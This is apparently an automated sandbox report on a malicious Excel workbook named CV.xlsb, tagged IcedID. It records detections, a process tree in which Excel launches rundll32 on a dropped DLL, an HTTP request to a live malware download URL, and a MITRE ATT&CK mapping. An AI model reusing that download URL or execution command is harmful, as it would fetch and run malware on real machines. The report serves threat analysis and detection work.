
Analysis Report CV.xlsb

Overview

General Information

Sample Name: CV.xlsb
Analysis ID: 319185
MD5: 97978d78a96b89671a7bcb1325ae9ed2
SHA1: 7d3c43d1d8d4657ce177126bbae27647b9e02ee2
SHA256: 3cbc9397d35ec1de513c7d7f747fb6b7773d468244b06bbfc60b4325f1e1b22b
Tags: IcedID, macro, xlsx

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5980 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6084 cmdline: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis
Data:
  • Command: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
  • CommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
  • CommandLine|base64offset|contains: (empty)
  • Image: C:\Windows\SysWOW64\rundll32.exe
  • NewProcessName: C:\Windows\SysWOW64\rundll32.exe
  • OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
  • ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
  • ParentProcessId: 5980
  • ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
  • ProcessId: 6084

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://205.185.113.20/BVd1qKwd; Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: CV.xlsb; ReversingLabs: Detection: 12%

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe

Source: global traffic; TCP traffic: 192.168.2.3:49713 -> 205.185.113.20:80
Source: Joe Sandbox View; IP Address: 205.185.113.20
Source: global traffic; HTTP traffic detected:
  GET /BVd1qKwd HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 205.185.113.20
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 205.185.113.20
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 18 Nov 2020 03:50:23 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 0
  Connection: keep-alive
  Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
  Expires: 0
  Last-Modified: Wed, 18 Nov 2020 03:50:23 GMT
  Pragma: no-cache
  Set-Cookie: _subid=1m9efdt1oal;Expires=Saturday, 19-Dec-2020 03:50:23 GMT;Max-Age=2678400;Path=/
  Vary: Accept-Encoding
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://lifecycle.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.local
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://management.azure.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://management.azure.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://messaging.office.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officeapps.live.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://settings.outlook.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://tasks.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Found Excel 4.0 Macro with suspicious formulas
Source: CV.xlsb | Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: CV.xlsb | Initial sample: Sheet size: 777285
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: sfc.dll
Source: classification engine | Classification label: mal76.expl.evad.winXLSB@3/4@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{D4802928-553D-4E9C-922B-548B6D7B447D} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: CV.xlsb | ReversingLabs: Detection: 12%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

(numbers in parentheses are the count of matching signatures for that technique)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting (2) | DLL Side-Loading (1) | Process Injection (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (22) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Rundll32 (1) | LSASS Memory | File and Directory Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol (12) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (1) | Security Account Manager | System Information Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting (2) | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
CV.xlsb | 3% | Virustotal |
CV.xlsb | 12% | ReversingLabs | Document-Office.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://205.185.113.20/BVd1qKwd | 11% | Virustotal |
http://205.185.113.20/BVd1qKwd | 0% | Avira URL Cloud | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://wus2-000.contentsync. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Virustotal |
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://ncus-000.contentsync. | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe
https://directory.services. | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://205.185.113.20/BVd1qKwd | true | Virustotal 11%; Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

All URLs below were extracted from the dropped file 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.dr, and none of them is marked malicious.

Name | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | | high
https://login.microsoftonline.com/ | | high
https://shell.suite.office.com:1443 | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | | high
https://cdn.entity. | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | | high
https://wus2-000.contentsync. | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | | high
https://powerlift.acompli.net | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | | high
https://cortana.ai | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | | high
https://cloudfiles.onenote.com/upload.aspx | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | | high
https://entitlement.diagnosticssdf.office.com | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | | high
https://api.aadrm.com/ | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | Virustotal 0%; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | | high
https://api.microsoftstream.com/api/ | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | | high
https://cr.office.com | | high
https://portal.office.com/account/?ref=ClientMeControl | | high
https://ecs.office.com/config/v2/Office | | high
https://graph.ppe.windows.net | | high
https://res.getmicrosoftkey.com/api/redemptionevents | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | URL Reputation: safe | unknown
https://tasks.office.com | | high
https://officeci.azurewebsites.net/api/ | Virustotal 0%; Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | | high
https://store.office.cn/addinstemplate | URL Reputation: safe | unknown
https://wus2-000.pagecontentsync. | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | | high
https://globaldisco.crm.dynamics.com | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | | high
https://store.officeppe.com/addinstemplate | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | | high
https://web.microsoftstream.com/video/ | | high
https://graph.windows.net | | high
https://dataservice.o365filtering.com/ | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | | high
https://prod-global-autodetect.acompli.net/autodetect | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | | high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | | high
http://weather.service.msn.com/data.aspx | | high
https://apis.live.net/v5.0/ | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | | high
https://management.azure.com | | high
https://outlook.office365.com | | high
https://incidents.diagnostics.office.com | | high
https://clients.config.office.net/user/v1.0/ios | | high
https://insertmedia.bing.office.net/odc/insertmedia | | high
https://o365auditrealtimeingestion.manage.office.com | | high
https://outlook.office365.com/api/v1.0/me/Activities | | high
https://api.office.net | | high
https://incidents.diagnosticssdf.office.com | | high
https://asgsmsproxyapi.azurewebsites.net/ | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | | high
https://entitlement.diagnostics.office.com | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | | high
https://autodiscover-s.outlook.com | | high
https://storage.live.com/clientlogs/uploadlocation | | high
https://templatelogging.office.com/client/log | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | | high
https://management.azure.com/ | | high
https://ncus-000.contentsync. | URL Reputation: safe | unknown
https://login.windows.net/common/oauth2/authorize | | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | URL Reputation: safe | unknown
https://graph.windows.net/ | | high
https://api.powerbi.com/beta/myorg/imports | | high
https://devnull.onenote.com | | high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | | high
https://messaging.office.com/ | | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | | high
https://augloop.office.com/v2 | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | | high
https://skyapi.live.net/Activity/ | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/mac | | high
https://dataservice.o365filtering.com | URL Reputation: safe | unknown
https://onedrive.live.com | | high
https://ovisualuiapp.azurewebsites.net/pbiagave/ | Avira URL Cloud: safe | unknown
https://visio.uservoice.com/forums/368202-visio-on-devices | | high
https://directory.services. | |
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://login.windows-ppe.net/common/oauth2/authorize2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://loki.delve.office.com/api/v1/configuration/officewin32/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://onedrive.live.com/embed?2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://augloop.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                                    high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
205.185.113.20 | unknown | United States | 53667 | PONYNET (US) | false

The "Malicious" flag here is a per-IP reputation lookup only; the same IP is associated with a series of malicious myResume.xlsb analyses in the Joe Sandbox View / Context section below.

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 319185
Start date: 18.11.2020
Start time: 04:49:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CV.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
